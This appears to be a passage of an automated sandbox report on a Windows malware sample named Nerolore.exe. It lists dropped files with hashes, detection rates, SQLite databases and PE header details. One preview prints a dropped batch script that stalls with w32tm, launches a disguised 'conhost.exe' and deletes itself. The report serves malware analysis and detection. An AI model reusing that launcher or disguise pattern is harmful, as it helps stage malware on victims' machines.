                              Entropy (8bit):4.540351927603488
                              Encrypted:false
                              SSDEEP:24:HIC9TOSfPuHvwKRNaluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+WUZ:oSfGYKREluOulajfqXSfbNtmhBZ
                              MD5:050911BBA31CD6446D538B3090C2C160
                              SHA1:6936EA63CB17D72671C78DB20A818EA2100C2517
                              SHA-256:54F896FF73CEFB8200C2E857D96CEADD96375B2FA8BEF520C0F17E3E67CBAC04
                              SHA-512:AAF1EF85010F91D6C95A3A32CAA4B5A1A02C6387B553C0FB5745B794E435903F3F80BF5DBFDD141BC40BAA3DC9041C48C14846C43FCF6EFEAB222EFFF5800359
                              Malicious:false
                              Preview:L...WC.f.............debug$S........0...................@..B.rsrc$01................\...........@..@.rsrc$02........p...p...............@..@........=....c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES9E35.tmp.-.<....................a..Microsoft (R) CVTRES.S.=..cwd.C:\FontHost.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe....................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):40960
                              Entropy (8bit):0.8553638852307782
                              Encrypted:false
                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                              MD5:28222628A3465C5F0D4B28F70F97F482
                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.213660689688185
                              Encrypted:false
                              SSDEEP:3:teB2dOd:q
                              MD5:C2CF16931E12C5B355C6B6E45E48433A
                              SHA1:2F3373509D50AE4D2D1AC72C76669EBF7A2725D4
                              SHA-256:AD2B01A1DD9B0F65EBBA6B2D4B5F843BAC40481DAFCA3B99C00521615A6D35B1
                              SHA-512:C7D15E56E48BB43C733AF9B5B25564F0FD077A314BE63AC7335D1A2C48C1B38B158DE7DA6AD7629C073F7876BB7B00232AE4AE86B5C8356EFA565A8F684DB406
                              Malicious:false
                              Preview:XNF1PKBI33K6RDSB0yrBHzk1a
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5707520969659783
                              Encrypted:false
                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                              Category:dropped
                              Size (bytes):51200
                              Entropy (8bit):0.8746135976761988
                              Encrypted:false
                              SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                              MD5:9E68EA772705B5EC0C83C2A97BB26324
                              SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                              SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                              SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):211
                              Entropy (8bit):5.041032002581369
                              Encrypted:false
                              SSDEEP:6:hCijTg3Nou1SV+DE1IDzKOZG1923fn8/kh:HTg9uYDE80/q
                              MD5:294EFEE643FE51EBDAE8EF743238C920
                              SHA1:603B31298F8E8DC179487E7733AD720FA7F37943
                              SHA-256:DFEA0554D271FBCA0EEE6EAECB0C318BDE486B5FB4627A3E1683D1556D1E3455
                              SHA-512:DCB3A57D6ED64F93255637341F54D6F9FAB26EBFB99E55BB8A9509A5F84196E0677CC2548579941CFF371449D84AB5C274F0BA0A590A12F3AA91DB08AF093E5B
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Users\All Users\dbg\conhost.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\aQ1wx53V7n.bat"
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):20480
                              Entropy (8bit):0.5707520969659783
                              Encrypted:false
                              SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                              MD5:9F6D153D934BCC50E8BC57E7014B201A
                              SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                              SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                              SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                              Category:dropped
                              Size (bytes):196608
                              Entropy (8bit):1.121297215059106
                              Encrypted:false
                              SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                              MD5:D87270D0039ED3A5A72E7082EA71E305
                              SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                              SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                              SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                              Malicious:false
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                              Category:dropped
                              Size (bytes):106496
                              Entropy (8bit):1.136413900497188
                              Encrypted:false
                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                              MD5:429F49156428FD53EB06FC82088FD324
                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                              Malicious:false
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):25
                              Entropy (8bit):4.133660689688185
                              Encrypted:false
                              SSDEEP:3:dVwwt97E4DHn:daOH
                              MD5:7339575A9A4751FDA40538F2321C479F
                              SHA1:54919F84C7F97A8DF30EBF6FD2C0A766739F4A13
                              SHA-256:8222C5C6EB4643EBA42A14077A4A82207FC4CD7E9D6ED3B19B17555BDDD5FB4B
                              SHA-512:F77D7B8BB0BF2F1737986DCD1E6B5D29D39BB4D000701B7E101AEBBEF3A3A9900EE29133B7317935199AB3A6491927208FADFA16C9D7C889CE950B6CEBEE1449
                              Malicious:false
                              Preview:uKMYpMvKXaUsyfHXawa2NRqfb
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):33792
                              Entropy (8bit):5.541771649974822
                              Encrypted:false
                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 29%
                              • Antivirus: Virustotal, Detection: 27%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):32256
                              Entropy (8bit):5.631194486392901
                              Encrypted:false
                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 25%
                              • Antivirus: Virustotal, Detection: 29%, Browse
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):85504
                              Entropy (8bit):5.8769270258874755
                              Encrypted:false
                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                              MD5:E9CE850DB4350471A62CC24ACB83E859
                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 71%
                              • Antivirus: Virustotal, Detection: 69%, Browse
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):32256
                              Entropy (8bit):5.631194486392901
                              Encrypted:false
                              SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                              MD5:D8BF2A0481C0A17A634D066A711C12E9
                              SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                              SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                              SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 25%
                              • Antivirus: Virustotal, Detection: 29%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):69632
                              Entropy (8bit):5.932541123129161
                              Encrypted:false
                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 17%
                              • Antivirus: Virustotal, Detection: 22%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):85504
                              Entropy (8bit):5.8769270258874755
                              Encrypted:false
                              SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                              MD5:E9CE850DB4350471A62CC24ACB83E859
                              SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                              SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                              SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 71%
                              • Antivirus: Virustotal, Detection: 69%, Browse
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):23552
                              Entropy (8bit):5.519109060441589
                              Encrypted:false
                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 8%
                              • Antivirus: Virustotal, Detection: 11%, Browse
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):33792
                              Entropy (8bit):5.541771649974822
                              Encrypted:false
                              SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                              MD5:2D6975FD1CC3774916D8FF75C449EE7B
                              SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                              SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                              SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                              Malicious:true
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 29%
                              • Antivirus: Virustotal, Detection: 27%, Browse
                              Process:C:\FontHost\ContainerAgentWinSession.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):23552
                              Entropy (8bit):5.519109060441589
                              Encrypted:false
                              SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                              MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                              SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                              SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                              SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 8%
                              • Antivirus: Virustotal, Detection: 11%, Browse
                              Process:C:\FontHost\NjWYKcLujkVoPzemFBeg.exe
                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):69632
                              Entropy (8bit):5.932541123129161
                              Encrypted:false
                              SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                              MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                              SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                              SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                              SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                              Malicious:true
                              Antivirus:
                              • Antivirus: Avira, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 17%
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:MSVC .res
                              Category:dropped
                              Size (bytes):1224
                              Entropy (8bit):4.435108676655666
                              Encrypted:false
                              SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                              MD5:931E1E72E561761F8A74F57989D1EA0A
                              SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                              SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                              SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                              Malicious:false
                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):4608
                              Entropy (8bit):3.9667612782894692
                              Encrypted:false
                              SSDEEP:48:6xJ3PteM7Jt8Bs3FJsdcV4MKe27Rd4u8Ln+vqBHKOulajfqXSfbNtm:IP9Pc+Vx9MgLn+vk0cjRzNt
                              MD5:C51809D570407388483DC19E072A55FE
                              SHA1:A1E3B198DB132B65B1B97AA0EF5315DD92FA388D
                              SHA-256:F7B458D725B669605C71A1A2F8AB83C9F1540ED1E338A900312DFC8776756E4A
                              SHA-512:8CE5EC56D0E021B645C591A375050B8A6D23366C65501EC0F81162880BF7B770A0F07BE0A0ECEF5594A9DD6AF07D19ADF81A9CC1C55DBC4607330A261D8760F8
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              Process:C:\Windows\System32\w32tm.exe
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):151
                              Entropy (8bit):4.779332558763312
                              Encrypted:false
                              SSDEEP:3:VLV993J+miJWEoJ8FX7IFBunRPVqvo135IqNvj:Vx993DEUR8RLEM
                              MD5:C977DD546B863B195831DB52F8D30D33
                              SHA1:75CFDD394F2548E924A152D9F3A2D7049167D3EF
                              SHA-256:0F68B5BA34A30CE0A970414D86A86A40ABA00D7B8045524AFA99B1DDDAECE10A
                              SHA-512:6B53BDBA356BC69591CA6A6E84D060A79A07277A0B235F11A3F8C2A087F2E4EECF17E387F8A9D5469B4FE5EC8A158DCA18121B45E641C6507BEB2DB58D1F8C91
                              Malicious:false
                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 25/08/2024 10:44:41..10:44:41, error: 0x80072746.10:44:46, error: 0x80072746.
                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):7.690714550424996
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                              • Win32 Executable (generic) a (10002005/4) 49.97%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:Nerolore.exe
                              File size:3'514'624 bytes
                              MD5:173524b924df7f85fc534a492707f643
                              SHA1:44362f40b387610d723ba6090ffacf5a17f98bd3
                              SHA256:9559e225f13920d3f18a77d324a732447c67b85073af3044237d51eefdbec0a2
                              SHA512:8e73fe1da84d8ccadf9b1134b5822777eaf104724485181aef5e59f03e98772957856d6a497fe32fd86550dc7b5dc2e9edc442e2c985b458d2ffa3f1c71a4e93
                              SSDEEP:98304:cakXfhdOVlgEzgxRe1fiPTqMebcUvt7MGo:ov2dzgy+ucCt7No
                              TLSH:CAF5E05658823D32C1989F304252327D54A1DEB97496EE0A780E30E36DBFBF45A762F3
                              Icon Hash: 04303a323a1a1804
                              Entrypoint: 0x40c0d4
                              Entrypoint Section:
                              Digitally signed: false
                              Imagebase: 0x400000
                              Subsystem: windows gui
                              Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                              DLL Characteristics: DYNAMIC_BASE, GUARD_CF, TERMINAL_SERVER_AWARE
                              Time Stamp: 0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major: 5
                              OS Version Minor: 1
                              File Version Major: 5
                              File Version Minor: 1
                              Subsystem Version Major: 5
                              Subsystem Version Minor: 1
                              Import Hash: d89f3dcdac0c8dba11dc1162435bedbb
                              Instruction
                              call 00007FC714D30026h
                              jmp 00007FC714D2FE3Eh
                              push 0044BB60h
                              push dword ptr fs:[00000000h]
                              mov eax, dword ptr [esp+10h]
                              mov dword ptr [esp+10h], ebp
                              lea ebp, dword ptr [esp+10h]
                              sub esp, eax
                              push ebx
                              push esi
                              push edi
                              mov eax, dword ptr [00466ECCh]
                              xor dword ptr [ebp-04h], eax
                              xor eax, ebp
                              push eax
                              mov dword ptr [ebp-18h], esp
                              push dword ptr [ebp-08h]
                              mov eax, dword ptr [ebp-04h]
                              mov dword ptr [ebp-04h], FFFFFFFEh
                              mov dword ptr [ebp-08h], eax
                              lea eax, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], eax
                              ret
                              mov ecx, dword ptr [ebp-10h]
                              mov dword ptr fs:[00000000h], ecx
                              pop ecx
                              pop edi
                              pop edi
                              pop esi
                              pop ebx
                              mov esp, ebp
                              pop ebp
                              push ecx
                              ret
                              int3
                              int3
                              int3
                              add esp, 04h
                              jmp 00007FC715178E8Fh
                              cdq
                              inc ecx
                              popad
                              fistp qword ptr [8E50D7DCh]
                              pop esp
                              mov ecx, 3230072Dh
                              add esp, dword ptr [esi+07h]
                              dec eax
                              fld dword ptr [ecx+56F1E397h]
                              bound esp, dword ptr [ebx+14h]
                              jbe 00007FC714D2FF97h
                              shr dword ptr [edx+7Fh], 57h
                              xchg cl, ah
                              mov dword ptr [edx+32h], ebp
                              movsd
                              or esi, 19ECC7ABh
                              cmpsb
                              not dword ptr [ebx]
                              stc
                              popfd
                              xchg eax, ecx
                              jc 00007FC714D2FFFDh
                              fdivr qword ptr [esi+edi*8+1Dh]
                              scasb
                              arpl word ptr [edx+3DAB5907h], bp
                              mov cl, 4Ah
                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729
                              Name | Virtual Address | Virtual Size | Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x371020 | 0x34 | cheat
                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x371054 | 0x210 | cheat
                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xae000 | 0x43d2c | .rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x371000 | 0xc | cheat
                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               | 0x1000 | 0x32000 | 0x1be00 | 529c48991506a3bf2bac15719e13e781 | False | 0.9972673766816144 | data | 7.996595675539958 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                               | 0x33000 | 0xb000 | 0x4800 | 9802a5374670305727a4dccb3a9eebe9 | False | 0.9949001736111112 | data | 7.979931163938514 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
